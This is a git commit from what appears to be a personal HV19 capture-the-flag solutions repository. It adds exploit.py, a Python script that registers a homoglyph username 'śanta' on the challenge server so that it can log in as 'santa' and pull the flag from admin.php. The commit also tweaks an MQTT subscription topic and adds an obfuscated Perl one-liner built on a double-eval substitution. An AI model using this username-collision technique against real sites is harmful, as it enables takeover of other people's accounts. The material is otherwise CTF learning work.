Day17 code

This commit is contained in:
Roman Hergenreder 2019-12-29 15:24:39 +01:00
parent 7926b309e2
commit 5267a8d008
5 changed files with 40 additions and 1 deletions

@ -7,7 +7,7 @@ import logging
def on_connect(client, userdata, flags, rc):
if rc == 0:
path = 'HV19/#';
path = 'HV19/gifts/#';
client.subscribe(path, qos=0)
def on_message(client, userdata, msg):

33
Day 17/exploit.py Normal file

@ -0,0 +1,33 @@
#!/usr/bin/python
import requests
import random
import string
import re
BASE_URL = "http://whale.hacking-lab.com:8881"
PASSWORD = ''.join([random.choice(string.ascii_lowercase) for i in range(8)])
SESSION = requests.session()
FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
# 1. register user santa
res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
if res.status_code != 200 or "Registration successful!" not in res.text:
print("Server returned: %d %s" % (res.status_code, res.status_text))
print(res.text)
exit(1)
# 2. login
res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
if res.status_code != 200 or "username not found or wrong password!" in res.text:
print("Server returned: %d %s" % (res.status_code, res.status_text))
print(res.text)
exit(1)
# 3. get flag
res = SESSION.get(BASE_URL + "/admin.php")
if res.status_code != 200 or "username not found or wrong password!" in res.text:
print("Server returned: %d %s" % (res.status_code, res.status_text))
exit(1)
print(FLAG_PATTERN.search(res.text))

5
Day 17/source.phps Normal file

File diff suppressed because one or more lines are too long

1
Hidden 04/input.pl Normal file

@ -0,0 +1 @@
s@@jSfx4gPcvtiwxPCagrtQ@,y^p-za-oPQ^a-z\x20\n^&&s[(.)(..)][\2\1]g;s%4(...)%"p$1t"%ee